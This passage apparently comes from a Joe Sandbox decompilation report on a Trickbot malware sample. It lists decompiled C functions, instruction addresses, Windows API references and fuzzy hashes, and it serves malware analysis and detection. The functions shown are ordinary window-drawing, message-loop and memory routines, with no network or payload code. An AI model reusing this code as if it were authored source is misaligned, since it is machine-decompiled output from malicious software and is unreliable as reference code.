						GetTextExtentPoint32A( *(_t91 - 0x30),  *_t90,  *( *_t90 - 8), _t91 - 0x24);
						 *(_t90 - 0xc) =  *(_t91 - 0x24);
						_push(0);
						_push( *_t90);
						_push( *(_t91 - 0x10));
						if(E004242F7( *((intOrPtr*)(_t91 - 0x1c))) == 0) {
							goto L14;
						}
						L12:
						_t86 = _t86 + 0x14;
						_t90 =  &(_t90[5]);
						 *(_t91 - 0x10) =  *(_t91 - 0x10) + 1;
					} while ( *(_t91 - 0x10) <  *((intOrPtr*)(_t91 + 0xc)));
					goto L15;
				}
			}

0x0043114b
0x00431159
0x0043115b
0x0043115e
0x00431165
0x00431270
0x00431274
0x0043127c
0x0043127c
0x0043116e
0x00431171
0x00431178
0x00431261
0x00431267
0x0043126c
0x00000000
0x0043126f
0x00431186
0x0043118c
0x00431190
0x00431192
0x00431199
0x0043119c
0x0043119f
0x004311ab
0x004311ab
0x004311b1
0x004311b4
0x004311b7
0x00431240
0x00431244
0x0043124c
0x0043124c
0x00431252
0x00431259
0x0043125e
0x00000000
0x004311bd
0x004311bd
0x004311c0
0x004311c3
0x004311c7
0x004311c9
0x004311cd
0x004311cf
0x004311d1
0x0043120f
0x00431217
0x00431218
0x0043121b
0x0043121e
0x00431221
0x00431223
0x00431223
0x00431223
0x00431223
0x00000000
0x00431221
0x004311dd
0x0043123d
0x0043123d
0x00000000
0x0043123d
0x004311ed
0x004311f9
0x004311fe
0x004311ff
0x00431200
0x0043120a
0x00000000
0x00000000
0x0043122a
0x0043122a
0x0043122d
0x00431230
0x00431236
0x00000000
0x0043123b

APIs

__EH_prolog.LIBCMT ref: 0043114B
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00431186

Part of subcall function 004214F6: __EH_prolog.LIBCMT ref: 004214FB
Part of subcall function 004214F6: GetDC.USER32(?), ref: 00421524

SelectObject.GDI32(?,00000000), ref: 004311A5
GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 004311ED
GetSystemMetrics.USER32(00000000), ref: 0043120F
SelectObject.GDI32(?,?), ref: 0043124C

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prologObjectSelect$ExtentMessageMetricsPoint32SendSystemText
String ID:
API String ID: 3673216194-0
Opcode ID: d9e56b3f31b45cba375d0ff70cae1890912aad5870379dcbcaaf54e2c13effaa
Instruction ID: ad8b5dff573d0eb7cf561f13d42782fbf9e12ec763b2b8bedaf0ddb995ac9046
Opcode Fuzzy Hash: d9e56b3f31b45cba375d0ff70cae1890912aad5870379dcbcaaf54e2c13effaa
Instruction Fuzzy Hash: EF413771A00209AFDF14DF95C8859AEFBB5FF48344F10942AE916A22A0D7789E41CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0042A9BF, Relevance: 9.1, APIs: 6, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0042A9BF(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				void* _t42;
				void* _t44;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				void* _t59;
				void* _t60;
				void* _t61;
				intOrPtr* _t62;

				_t58 = __edx;
				_t59 = GetCapture;
				_t60 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E0041884D(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
				if(E0041884D(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
					L19:
					E0042A6AF(_t60, _t72);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t31 = _v32.message - 0x100;
						if(_t31 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
								E0042A0DE(_t60, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t33 = E0041884D(_t61, GetCapture());
								_t72 = _t33 -  *((intOrPtr*)(_t60 + 0x68));
								if(_t33 ==  *((intOrPtr*)(_t60 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t35 = _t31 - 1;
						if(_t35 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if(__eflags != 0) {
								E0042A0DE(_t60, _v32.wParam, 0);
							}
							goto L18;
						}
						_t37 = _t35 - 0xff;
						if(_t37 == 0) {
							_t55 = _v32.pt;
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t58 = _v8;
							_push(_t55);
							_push(_t55);
							_t38 = _t62;
							 *_t38 = _t55;
							 *((intOrPtr*)(_t38 + 4)) = _v8;
							_t56 = _t60;
							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
								E0042A36A(_t56, _t59);
							} else {
								E0042A062(_t56);
							}
							goto L18;
						}
						_t42 = _t37;
						if(_t42 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t57 = _t60;
							if(__eflags == 0) {
								E0042A4D2(_t61, __eflags);
							} else {
								E0042A112(_t57, _t58, _t59, _t60, __eflags);
							}
							_t44 = 1;
							return _t44;
						}
						if(_t42 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					E00437058(_v32.wParam);
					goto L19;
				}
			}

0x0042a9bf
0x0042a9c8
0x0042a9ce
0x0042a9d4
0x0042aaae
0x00000000
0x0042aaae
0x0042a9e7
0x0042a9f7
0x0042aaa7
0x0042aaa9
0x00000000
0x0042a9fd
0x0042a9ff
0x0042aa17
0x0042aa1c
0x0042aa7c
0x0042aa82
0x0042aa8b
0x0042aa8b
0x0042aa90
0x0042aa94
0x0042aa96
0x0042aa99
0x0042aa9e
0x0042aaa1
0x00000000
0x00000000
0x0042aaa1
0x00000000
0x0042aa94
0x0042aa1e
0x0042aa1f
0x0042aa67
0x0042aa6d
0x0042aa75
0x0042aa75
0x00000000
0x0042aa6d
0x0042aa21
0x0042aa26
0x0042aa40
0x0042aa43
0x0042aa49
0x0042aa4c
0x0042aa4d
0x0042aa4e
0x0042aa50
0x0042aa52
0x0042aa55
0x0042aa57
0x0042aa60
0x0042aa59
0x0042aa59
0x0042aa59
0x00000000
0x0042aa57
0x0042aa29
0x0042aa2a
0x0042aabf
0x0042aac5
0x0042aac7
0x0042aad0
0x0042aac9
0x0042aac9
0x0042aac9
0x0042aad7
0x00000000
0x0042aad7
0x0042aa32
0x00000000
0x00000000
0x0042aa38
0x00000000
0x0042aa38
0x0042aab8
0x00000000
0x0042aab8

APIs

GetCapture.USER32 ref: 0042A9D0
SetCapture.USER32(?), ref: 0042A9E0
GetCapture.USER32 ref: 0042A9EC
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0042AA06
DispatchMessageA.USER32(?), ref: 0042AA38
GetCapture.USER32 ref: 0042AA96

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Capture$Message$Dispatch
String ID:
API String ID: 3654672037-0
Opcode ID: 4fadac2d2b6ec87a825ee8cb401d699979e30f607694b36dd129cc2155238ff3
Instruction ID: 8fc101fb7659808ffcdfb29c644392aa1366e3f398272a30efadd82f301add58
Opcode Fuzzy Hash: 4fadac2d2b6ec87a825ee8cb401d699979e30f607694b36dd129cc2155238ff3
Instruction Fuzzy Hash: EC31D831700226DBCB21BFA9A94596F76A8EF44700FD4442FA846D2251CE7C9CA1DA6F

Uniqueness

Uniqueness Score: -1.00%

Function 00432B56, Relevance: 9.1, APIs: 6, Instructions: 85
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E00432B56(long* __ecx, signed int _a4, intOrPtr _a8) {
				void* _v8;
				void* __ebp;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t39;
				signed int* _t45;
				void* _t58;
				long* _t61;

				_push(__ecx);
				_t61 = __ecx;
				_t58 = TlsGetValue( *__ecx);
				if(_t58 == 0) {
					_t28 = E0043291C(0x10);
					if(_t28 == 0) {
						_t58 = 0;
					} else {
						 *_t28 = 0x43d414;
						_t58 = _t28;
					}
					 *(_t58 + 8) =  *(_t58 + 8) & 0x00000000;
					 *(_t58 + 0xc) =  *(_t58 + 0xc) & 0x00000000;
					_t8 = _t58 + 8; // 0x8
					_t45 = _t8;
					_t9 =  &(_t61[7]); // 0x44b4bc
					_v8 = _t58;
					EnterCriticalSection(_t9);
					_t11 =  &(_t61[5]); // 0x44b4b4
					_t48 = _t11;
					E004328C3(_t11, _t58);
					_t12 =  &(_t61[7]); // 0x44b4bc
					LeaveCriticalSection(_t12);
					goto L8;
				} else {
					_t2 = _t58 + 8; // 0x8
					_t45 = _t2;
					if(_a4 >=  *_t45 && _a8 != 0) {
						L8:
						_t32 =  *(_t58 + 0xc);
						if(_t32 != 0) {
							_t15 =  &(_t61[3]); // 0x4
							_t48 =  *_t15 << 2;
							_t33 = LocalReAlloc(_t32,  *_t15 << 2, 2);
						} else {
							_t14 =  &(_t61[3]); // 0x4
							_t33 = LocalAlloc(0,  *_t14 << 2);
						}
						 *(_t58 + 0xc) = _t33;
						if(_t33 == 0) {
							E0041564B(_t48);
						}
						_t17 =  &(_t61[3]); // 0x4
						E00405360( *(_t58 + 0xc) +  *_t45 * 4, 0,  *_t45 * 0x3fffffff +  *_t17 << 2);
						_t21 =  &(_t61[3]); // 0x4
						 *_t45 =  *_t21;
						TlsSetValue( *_t61, _t58);
					}
				}
				_t39 =  *(_t58 + 0xc);
				 *((intOrPtr*)(_t39 + _a4 * 4)) = _a8;
				return _t39;
			}

0x00432b59
0x00432b5c
0x00432b67
0x00432b6b
0x00432b89
0x00432b90
0x00432b9c
0x00432b92
0x00432b92
0x00432b98
0x00432b98
0x00432b9e
0x00432ba2
0x00432ba6
0x00432ba6
0x00432ba9
0x00432bad
0x00432bb0
0x00432bb7
0x00432bb7
0x00432bba
0x00432bbf
0x00432bc3
0x00000000
0x00432b6d
0x00432b70
0x00432b70
0x00432b75
0x00432bc9
0x00432bc9
0x00432bce
0x00432be1
0x00432be6
0x00432beb
0x00432bd0
0x00432bd0
0x00432bd9
0x00432bd9
0x00432bf3
0x00432bf6
0x00432bf8
0x00432bf8
0x00432c07
0x00432c17
0x00432c1c
0x00432c22
0x00432c27
0x00432c27
0x00432b75
0x00432c2d
0x00432c38
0x00432c3d

APIs

TlsGetValue.KERNEL32(0044B4A0,0044B2EC,00000000,?,0044B4A0,?,00432DBE,0044B2EC,00000000,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C), ref: 00432B61
EnterCriticalSection.KERNEL32(0044B4BC,00000010,?,0044B4A0,?,00432DBE,0044B2EC,00000000,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C), ref: 00432BB0
LeaveCriticalSection.KERNEL32(0044B4BC,00000000,?,0044B4A0,?,00432DBE,0044B2EC,00000000,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C), ref: 00432BC3
LocalAlloc.KERNEL32(00000000,00000004,?,0044B4A0,?,00432DBE,0044B2EC,00000000,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C), ref: 00432BD9
LocalReAlloc.KERNEL32(?,00000004,00000002,?,0044B4A0,?,00432DBE,0044B2EC,00000000,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C), ref: 00432BEB
TlsSetValue.KERNEL32(0044B4A0,00000000), ref: 00432C27

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: 6f08718e99aee76a91ab9c3eee3bf652cb5089147d9f45482e0f3ba63d4090eb
Instruction ID: 6a1cec24ef0a738d27fd7b160e243ed9b9806b52b958dbe0a0cbadbbd1e17570
Opcode Fuzzy Hash: 6f08718e99aee76a91ab9c3eee3bf652cb5089147d9f45482e0f3ba63d4090eb
Instruction Fuzzy Hash: 0E319C71100A05AFD724CF15C889FA6B7E8FB49364F00992AE81AC7650DBB4F805CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004136F0, Relevance: 9.1, APIs: 6, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004136F0(void* __eflags, struct HWND__* _a4, struct HDC__* _a8, struct tagRECT* _a12, signed int _a16) {
				CHAR* _v8;
				long _v12;
				void* _v24;
				long _t30;
				long _t36;
				int _t38;
				signed short _t40;
				struct HWND__* _t50;
				signed int _t51;
				signed int _t52;
				struct tagRECT* _t53;
				CHAR* _t54;

				_t53 = _a12;
				PatBlt(_a8, _t53->left, _t53->top, _t53->right - _t53->left, _t53->bottom - _t53->top, 0xf00021);
				_t50 = _a4;
				_t38 = GetWindowTextLengthA(_t50);
				_t30 = E00405B80(_t26 + 8 & 0xfffffffc, _a8);
				_v8 = _t54;
				if(_v8 != 0) {
					_t30 = GetWindowTextA(_t50, _v8, _t38 + 2);
					if(_t30 != 0) {
						_t40 = 0x140;
						_t51 = _a16;
						if((_t51 & 0x0000000f) != 0xc) {
							_t40 = _t51 & 0x0000000f | 0x00000150;
						}
						if((_t51 & 0x00000080) != 0) {
							_t40 = _t40 | 0x00000008;
						}
						_t52 = _t51 & 0x08000000;
						if(_t52 != 0) {
							_t36 =  *0x44d37c; // 0x0
							_v12 = SetTextColor(_a8, _t36);
						}
						_t30 = DrawTextA(_a8, _v8, 0xffffffff, _t53, _t40 & 0x0000ffff);
						if(_t52 != 0) {
							_t30 = SetTextColor(_a8, _v12);
						}
					}
				}
				return _t30;
			}

0x004136f9
0x00413718
0x0041371e
0x00413728
0x00413733
0x00413738
0x0041373f
0x0041374a
0x00413752
0x00413754
0x00413758
0x00413761
0x00413769
0x00413769
0x00413774
0x00413776
0x00413776
0x00413779
0x0041377f
0x00413781
0x00413791
0x00413791
0x004137a3
0x004137ab
0x004137b5
0x004137b5
0x004137ab
0x00413752
0x004137c4

APIs

PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00413718
GetWindowTextLengthA.USER32(?), ref: 00413722
GetWindowTextA.USER32(?,00000000,00000000), ref: 0041374A
SetTextColor.GDI32(?,00000000), ref: 0041378B
DrawTextA.USER32(?,00000000,000000FF,?,?), ref: 004137A3
SetTextColor.GDI32(?,?), ref: 004137B5

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Text$ColorWindow$DrawLength
String ID:
API String ID: 1177705772-0
Opcode ID: f1a971cf7509041493298ab1fa3222ab3b72bd473a12b6bd32f3dc463716aace
Instruction ID: 58b5a1084d67139638d09badf21533b44d8372ff3fb946c7286e2ffb9a3225e2
Opcode Fuzzy Hash: f1a971cf7509041493298ab1fa3222ab3b72bd473a12b6bd32f3dc463716aace
Instruction Fuzzy Hash: 92217CB6600209AFDB10DF68DC48EFB77B9EB88321F148159FD2593390D674AE40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041956C, Relevance: 9.1, APIs: 6, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041956C(intOrPtr* __ecx, void* __edx, void* __edi) {
				struct HWND__* _t33;
				int _t35;
				void* _t37;
				void* _t52;
				void* _t53;
				intOrPtr* _t57;
				void* _t58;
				void* _t60;

				_t53 = __edi;
				_t52 = __edx;
				E00405340(E0043780C, _t60);
				_push(__ecx);
				_t57 = __ecx;
				 *((intOrPtr*)(_t60 - 0x10)) =  *((intOrPtr*)(E00432562() + 4));
				E00432562();
				E0041BB22();
				 *(_t60 - 4) = 0;
				if( *((intOrPtr*)( *_t57 + 0xb0))() != 0) {
					 *((intOrPtr*)( *_t57 + 0xf0))();
				}
				_push(_t53);
				SendMessageA( *(_t57 + 0x1c), 0x1f, 0, 0);
				E00419F94(_t52,  *(_t57 + 0x1c), 0x1f, 0, 0, 1, 1);
				_t48 = _t57;
				_t58 = E00419DFD(_t57);
				SendMessageA( *(_t58 + 0x1c), 0x1f, 0, 0);
				E00419F94(_t52,  *(_t58 + 0x1c), 0x1f, 0, 0, 1, 1);
				_t33 = GetCapture();
				if(_t33 != 0) {
					SendMessageA(_t33, 0x1f, 0, 0);
				}
				_t35 = WinHelpA( *(_t58 + 0x1c),  *( *((intOrPtr*)(_t60 - 0x10)) + 0x8c),  *(_t60 + 0xc),  *(_t60 + 8));
				_t65 = _t35;
				if(_t35 == 0) {
					_push(0xffffffff);
					_push(0);
					_push(0xf107);
					E00428683(_t48, _t65);
				}
				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
				E00432562();
				_t37 = E0041BB37();
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
				return _t37;
			}

0x0041956c
0x0041956c
0x00419571
0x00419576
0x00419579
0x00419583
0x00419586
0x0041958e
0x00419599
0x004195a4
0x004195aa
0x004195aa
0x004195b0
0x004195be
0x004195cb
0x004195d0
0x004195d8
0x004195e0
0x004195ed
0x004195f2
0x004195fa
0x00419601
0x00419601
0x00419615
0x0041961b
0x0041961e
0x00419620
0x00419622
0x00419623
0x00419628
0x00419628
0x0041962d
0x00419631
0x00419639
0x00419643
0x0041964b

APIs

__EH_prolog.LIBCMT ref: 00419571
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004195BE
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004195E0
GetCapture.USER32 ref: 004195F2
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00419601
WinHelpA.USER32(?,?,?,?), ref: 00419615

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: adc22d459c4f50ed27d5a56bd9e839dbce410aa24dfb8b2812f160b3992fdd90
Instruction ID: c50fd0a47b97c02ea19ea16424d869409c254042698b9381e294f1ad428140f2
Opcode Fuzzy Hash: adc22d459c4f50ed27d5a56bd9e839dbce410aa24dfb8b2812f160b3992fdd90
Instruction Fuzzy Hash: 66219271200209BFEB21AF61DC89FAA77A9EF08754F14852DF141971E2CBB49D409B24

Uniqueness

Uniqueness Score: -1.00%

Function 0042FB10, Relevance: 9.1, APIs: 6, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042FB10(intOrPtr _a4, RECT* _a8, intOrPtr _a12, intOrPtr _a16, struct HBRUSH__* _a20) {
				struct tagRECT _v20;
				struct HBRUSH__* _t46;
				long _t50;
				struct HBRUSH__* _t52;
				intOrPtr _t59;
				struct HBRUSH__* _t60;
				long _t64;
				struct HBRUSH__* _t66;
				intOrPtr _t70;
				intOrPtr _t72;

				CopyRect( &_v20, _a8);
				_v20.right = _v20.left + _a12;
				_t46 = _a20;
				if(_t46 != 0) {
					_t46 =  *(_t46 + 4);
				}
				_t72 = _a4;
				FillRect( *(_t72 + 4),  &_v20, _t46);
				_t50 = _a8->right;
				_v20.right = _t50;
				_v20.left = _t50 - _a12;
				_t52 = _a20;
				if(_t52 != 0) {
					_t52 =  *(_t52 + 4);
				}
				FillRect( *(_t72 + 4),  &_v20, _t52);
				CopyRect( &_v20, _a8);
				_t70 = _a16;
				_v20.bottom = _v20.top + _t70;
				_t59 = _a12;
				_v20.left = _v20.left + _t59;
				_v20.right = _v20.right - _t59;
				_t60 = _a20;
				if(_t60 != 0) {
					_t60 =  *(_t60 + 4);
				}
				FillRect( *(_t72 + 4),  &_v20, _t60);
				_t64 = _a8->bottom;
				_v20.bottom = _t64;
				_v20.top = _t64 - _t70;
				_t66 = _a20;
				if(_t66 != 0) {
					_t66 =  *(_t66 + 4);
				}
				return FillRect( *(_t72 + 4),  &_v20, _t66);
			}

0x0042fb26
0x0042fb30
0x0042fb33
0x0042fb38
0x0042fb3a
0x0042fb3a
0x0042fb3d
0x0042fb4e
0x0042fb53
0x0042fb56
0x0042fb5c
0x0042fb5f
0x0042fb64
0x0042fb66
0x0042fb66
0x0042fb71
0x0042fb7a
0x0042fb7c
0x0042fb84
0x0042fb87
0x0042fb8a
0x0042fb8d
0x0042fb90
0x0042fb95
0x0042fb97
0x0042fb97
0x0042fba2
0x0042fba7
0x0042fbaa
0x0042fbaf
0x0042fbb2
0x0042fbb7
0x0042fbb9
0x0042fbb9
0x0042fbca

APIs

CopyRect.USER32(?,?), ref: 0042FB26
FillRect.USER32(?,?,?), ref: 0042FB4E
FillRect.USER32(?,?,?), ref: 0042FB71
CopyRect.USER32(?,?), ref: 0042FB7A
FillRect.USER32(?,?,?), ref: 0042FBA2
FillRect.USER32(?,?,?), ref: 0042FBC4

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Fill$Copy
String ID:
API String ID: 4194453840-0
Opcode ID: 445d6d768625bd53249d3c69998b48563eb8e11fbc0dc3396b2e7305795024a1
Instruction ID: f8f4c66fb0c108c53764a6bd85a7439a7e8a00f3560e574e77d4b8bfe7b19bff
Opcode Fuzzy Hash: 445d6d768625bd53249d3c69998b48563eb8e11fbc0dc3396b2e7305795024a1
Instruction Fuzzy Hash: 5D3196B5A0011AAFCF00CFA9DD85DAEBBF8FF08254B448566B918D7211D730E914DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00423FD8, Relevance: 9.1, APIs: 6, Instructions: 76
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00423FD8(void* __ecx, void* __eflags) {
				void* _t57;
				void* _t75;
				void* _t77;

				E00405340(E004386DC, _t77);
				_t75 = __ecx;
				_push(__ecx);
				E004215AA(_t77 - 0x40, __eflags);
				 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
				GetClientRect( *(__ecx + 0x1c), _t77 - 0x2c);
				GetWindowRect( *(_t75 + 0x1c), _t77 - 0x1c);
				E0042147E(_t75, _t77 - 0x1c);
				OffsetRect(_t77 - 0x2c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
				E004212C8(_t77 - 0x40, _t77 - 0x2c);
				OffsetRect(_t77 - 0x1c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
				E00429984(_t75, _t77 - 0x40, _t77 - 0x1c);
				E0042130A(_t77 - 0x40, _t77 - 0x1c);
				SendMessageA( *(_t75 + 0x1c), 0x14,  *(_t77 - 0x3c), 0);
				E00429B32(_t75, _t77 - 0x40, _t77 - 0x1c);
				_t25 = _t77 - 4;
				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				_t57 = E0042161C(_t77 - 0x40,  *_t25);
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t57;
			}

0x0042950c
0x00429515
0x00429518
0x0042951c
0x00429521
0x0042952c
0x00429539
0x00429545
0x00429560
0x00429569
0x0042957e
0x0042958a
0x00429596
0x004295a5
0x004295b5
0x004295ba
0x004295ba
0x004295c1
0x004295cb
0x004295d3

APIs

__EH_prolog.LIBCMT ref: 0042950C

Part of subcall function 004215AA: __EH_prolog.LIBCMT ref: 004215AF
Part of subcall function 004215AA: GetWindowDC.USER32(?), ref: 004215D8

GetClientRect.USER32(?,?), ref: 0042952C
GetWindowRect.USER32(?,?), ref: 00429539

Part of subcall function 0042147E: ScreenToClient.USER32(?,0041A23B), ref: 00421492
Part of subcall function 0042147E: ScreenToClient.USER32(?,0041A243), ref: 0042149B

OffsetRect.USER32(?,?,?), ref: 00429560

Part of subcall function 004212C8: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 004212ED
Part of subcall function 004212C8: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00421302

OffsetRect.USER32(?,?,?), ref: 0042957E

Part of subcall function 0042130A: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0042132F
Part of subcall function 0042130A: IntersectClipRect.GDI32(?,?,?,?,?), ref: 00421344

SendMessageA.USER32(?,00000014,?,00000000), ref: 004295A5

Part of subcall function 0042161C: __EH_prolog.LIBCMT ref: 00421621
Part of subcall function 0042161C: ReleaseDC.USER32(?,00000000), ref: 00421640

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Clip$ClientH_prolog$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
String ID:
API String ID: 2727942566-0
Opcode ID: 62bb22d175033b747a62ae63b1036660585fd1810be35b8259a0e7cfe774f95f
Instruction ID: 2f74603f0f0cea5cabda4f7a6efd9b4d3e0b84291617c0ac15baacd38671e928
Opcode Fuzzy Hash: 62bb22d175033b747a62ae63b1036660585fd1810be35b8259a0e7cfe774f95f
Instruction Fuzzy Hash: EF21ECB6E0011DAFCF15EBA4DC45DEEB77DEB54314F00462AE512E3190DA78A906CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004243B4, Relevance: 9.1, APIs: 6, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004243B4(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v16;
				char _v20;
				struct tagRECT _v36;
				struct HDC__* _v48;
				struct HDC__* _v52;
				char _v56;
				struct tagTEXTMETRICA _v112;
				void* __ebp;
				void* _t28;
				int _t38;
				intOrPtr* _t43;
				intOrPtr _t55;
				intOrPtr* _t56;
				intOrPtr _t57;

				_t56 = __ecx;
				_push(0);
				E004214F6( &_v56, __eflags);
				_t28 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
				_v8 = 0;
				if(_t28 != 0) {
					_v8 = SelectObject(_v52, _t28);
				}
				GetTextMetricsA(_v48,  &_v112);
				_t63 = _v8;
				if(_v8 != 0) {
					SelectObject(_v52, _v8);
				}
				E00421568( &_v56, _t63);
				SetRectEmpty( &_v36);
				E004312E3(_t56, _t63,  &_v36, _a12);
				 *((intOrPtr*)( *_t56 + 0xa0))(0x407, 0,  &_v20);
				_t38 = GetSystemMetrics(6);
				_t57 =  *((intOrPtr*)(_t56 + 0x78));
				_t55 = (_t38 + _v16 << 1) - _v36.bottom - _v36.top - _v112.tmInternalLeading + _v112.tmHeight - 1;
				if(_t55 < _t57) {
					_t55 = _t57;
				}
				_t43 = _a4;
				 *_t43 = 0x7fff;
				 *((intOrPtr*)(_t43 + 4)) = _t55;
				return _t43;
			}

0x004243bd
0x004243c4
0x004243c5
0x004243d1
0x004243df
